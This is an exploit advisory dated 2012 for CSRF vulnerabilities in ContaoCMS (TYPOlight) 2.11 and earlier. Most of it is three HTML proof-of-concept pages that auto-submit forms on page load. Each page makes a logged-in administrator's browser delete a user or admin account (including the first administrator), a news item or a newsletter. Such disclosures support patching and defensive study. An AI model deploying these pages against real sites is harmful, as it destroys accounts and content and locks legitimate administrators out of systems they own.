+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ContaoCMS (fka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)
# Date : 25-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://www.contao.org/en/download.html
# Vendor site : http://www.contao.org
# Version : 2.11.0 (latest) and lower
# Tested on : Debian Squeeze (6.0)
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+
Summary
1)Introduction
2)Vulnerabilities Description
2.1 Delete Administrators or Users
2.2 Delete News
2.3 Delete Newsletter
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
is easy to maintain".
2)Vulnerabilities Description
Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages
(articles, news, newsletter and so on).
2.1 Delete Administrators or Users
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete ADMIN/USER account</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">
</body>
</html>
Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase.
2.2 Delete News
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete News</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">
</form>
</body>
</html>
2.3 Delete Newsletter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete Newsletter</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------------------------------+